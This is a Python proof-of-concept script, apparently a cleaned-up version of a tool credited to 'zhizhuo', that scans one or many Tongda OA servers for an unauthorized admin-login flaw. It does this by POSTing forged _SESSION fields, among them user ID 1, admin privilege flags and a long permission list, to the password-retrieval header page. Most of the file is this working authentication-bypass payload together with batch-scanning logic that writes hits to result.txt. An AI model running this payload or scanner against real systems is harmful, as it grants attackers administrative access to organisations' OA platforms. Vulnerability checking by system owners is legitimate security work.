import argparse
from cgitb import text
import os
from pickletools import pyint
import re
import warnings
import requests

# Every probe request below is sent with verify=False (no certificate
# validation), so urllib3's InsecureRequestWarning would be printed once per
# target; silence it together with any other Python warnings.
requests.packages.urllib3.disable_warnings()
warnings.filterwarnings('ignore')
# Nothing in this script imports TensorFlow; presumably left over from a
# template.  Kept because it is a harmless process-level side effect.
os.environ["TF_CPP_MIN_LOG_LEVEL"] = '1'

# Browser-like request headers shared by every probe request.
headers = {
    'User-Agent': (
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
        '(KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36'
    ),
    'Accept': (
        'text/html,application/xhtml+xml,application/xml;q=0.9,'
        'image/avif,image/webp,image/apng,*/*;q=0.8,'
        'application/signed-exchange;v=b3;q=0.9'
    ),
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Accept-Encoding': 'gzip, deflate, br',
    'Upgrade-Insecure-Requests': '1',
    'Pragma': 'no-cache',
    'Cache-Control': 'no-cache',
    # 'close' instead of the default 'keep-alive': with a persistent
    # connection, scanning many targets in a row produced
    # "Max retries exceeded with url" errors.
    'Connection': 'close',
}


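def _load_targets(url_arg, file_arg):
    """Return the raw targets to scan.

    A single -u value takes precedence over the file; otherwise every
    non-blank line of *file_arg* is a target.  The file handle is closed
    before returning (the original left it open), and blank or
    whitespace-only lines are skipped so they do not become a request to
    "http://".  A missing file raises, as before.
    """
    if url_arg is not None:
        return [str(url_arg)]
    with open(str(file_arg), encoding='utf8') as fh:
        lines = fh.read().splitlines()
    return [line.strip() for line in lines if line.strip()]


def _normalize_url(target):
    """Return *target* with a scheme and no trailing slash.

    Bare hosts get "http://"; existing http:// or https:// URLs are kept.
    The original only tested ``'http' in u``, which wrongly left a host such
    as "www.httpbin.org" without a scheme.  The trailing "/" is dropped so
    the probe path can be appended without producing "//".
    """
    target = str(target).strip()
    if not target.lower().startswith(('http://', 'https://')):
        target = 'http://' + target
    return target.rstrip('/')


def _probe(url):
    """Run the two-request check against one normalized *url*.

    Returns True when the GET response carries the '禁止' (denied) marker and
    the '找回OA登录密码' page title, but the POST response with the
    session-override form fields comes back 200 with the denied marker gone.
    Network errors propagate to the caller.
    """
    base_url = url + "/module/retrieve_pwd/header.inc.php"
    resp = requests.get(
        url=base_url, headers=headers, timeout=5, verify=False)
    # The original tested '禁止访问' or '禁止'; the second substring subsumes
    # the first, so one test is equivalent.
    if not ('禁止' in resp.text and '找回OA登录密码' in resp.text):
        return False
    data = {
        '_SESSION[LOGIN_THEME]':'15',
        '_SESSION[LOGIN_USER_ID]':'1',
        '_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]':'1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,225,236,78,178,104,121,149,84,99,100,533,101,113,198,540,626,638,38,',
        '_SESSION[LOGIN_USER_PRIV]':'1',
        '_SESSION[LOGIN_USER_PRIV_OTHER]':'1',
        '_SESSION[LOGIN_USER_PRIV_TYPE]':'1',
        '_SESSION[LOGIN_NOT_VIEW_USER]':'0',
        '_SESSION[RETRIEVE_PWD_USER]':'2s'
    }
    resp1 = requests.post(
        base_url, data=data, headers=headers, timeout=5, verify=False)
    return ('禁止访问' not in resp1.text
            and resp1.status_code == 200
            and '找回OA登录密码' in resp1.text)


def verify(url_arg, file_arg):
    """Scan one URL (*url_arg*) or every URL listed in *file_arg*.

    ./result.txt is emptied first and every positive target is appended to
    it as one UTF-8 line.  The original appended without an encoding, which
    can raise UnicodeEncodeError on non-UTF-8 locales and was then hidden by
    the bare ``except: pass``; per-target failures are now printed and the
    scan continues with the next target.  A missing *file_arg* still raises.
    """
    # 'w' truncates on open; the original opened in a+ and called truncate(0).
    with open('./result.txt', 'w', encoding='utf-8'):
        pass
    for raw in _load_targets(url_arg, file_arg):
        url = _normalize_url(raw)
        print("[-]正在检测{}".format(url))
        try:
            hit = _probe(url)
        except Exception as e:  # best-effort scan: report and move on
            print("[!]{}检测失败: {}".format(url, e))
            continue
        if not hit:
            continue
        print('================================')
        print('[+]{}存在漏洞'.format(url))
        print('================================')
        with open('./result.txt', 'a+', encoding='utf-8') as f:
            f.write('{} 存在未授权用户后台漏洞'.format(url))
            f.write('\n')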


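def main():
    """Command-line entry point.

    Parses -u/-url (single target) and -f/-file (file of targets), prints
    the banner, and hands the arguments to verify().  With neither option
    given it only prints the usage hint.
    """
    parser = argparse.ArgumentParser(
        description='''
        通达OA未授权用户登录后台检测poc
        by zhizhuo
        ''')
    parser.add_argument('-u', '-url', dest="url",
                        help='单个url检测,输入样例http://www.baidu.com', required=False)
    parser.add_argument('-f', '-file', dest="url_file", nargs='?',
                        help='多个url检测,以文件形式存储,文件中的url格式为http://www.baidu.com或者www.baidu.com', required=False)
    # Parse once; the original called parse_args() twice, once per attribute.
    args = parser.parse_args()
    url_arg = args.url
    file_arg = args.url_file
    print('''
        通达OA未授权用户登录后台检测poc
        by zhizhuo
        ''')
    if file_arg is None and url_arg is None:
        print("请使用命令-h查看命令使用帮助 --by zhizhuo")
    else:
        verify(url_arg, file_arg)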


if __name__ == '__main__':
    # Only start a scan when run as a script, not when imported.
    main()